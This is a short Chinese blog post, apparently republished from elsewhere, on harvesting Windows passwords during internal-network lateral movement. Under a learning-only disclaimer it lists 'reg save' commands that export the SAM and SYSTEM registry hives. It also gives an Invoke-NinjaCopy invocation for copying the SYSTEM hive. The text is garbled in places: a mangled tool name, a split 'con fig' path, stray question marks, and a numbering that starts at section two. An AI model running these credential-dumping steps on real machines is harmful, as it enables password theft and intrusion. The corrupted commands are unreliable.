内网横向渗透之密码搜集(内网横向渗透 实战)

作者:锄禾锐志
围观群众:309
更新于

本文仅用于技术讨论与研究,对于文中所有的工具以及命令,都是本人自行搭建的环境进行测试的。文中使用的技术仅用于学习教育目的,如果文中出现的技术用于其他任何目的及目标,作者概不负责。

二、常见的方法

1.抓取本地SAM文件中的密码 从注册表中导出

reg save HKLM\SYSTEM sys.hiv ? #获取SYSTEM注册表信息,导出为sys.hiv文件

reg save HKLM\SAM sam.hiv ? ? ? ? ? #获取SAM注册表信息,导出为sam.hiv文件

2.还可以使用nihs_x0008_ng中的Invoke-NinjaCopy.ps1脚本导出

①导出SAM文件 Invoke-NinjaCopy -Path "C:\Windows\System32\con fig\SYSTEM" -LocalDestination "C:\Windows\Temp\PowerShell-master\PowerShell-master\Invoke-NinjaCopy\sys.hiv"

非特殊说明,本文版权归 金科常识网 所有,转载请注明出处.

本文分类: 热门

本文标题: 内网横向渗透之密码搜集(内网横向渗透 实战)

本文网址: http://sddljzx.com/remen/1875.html

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。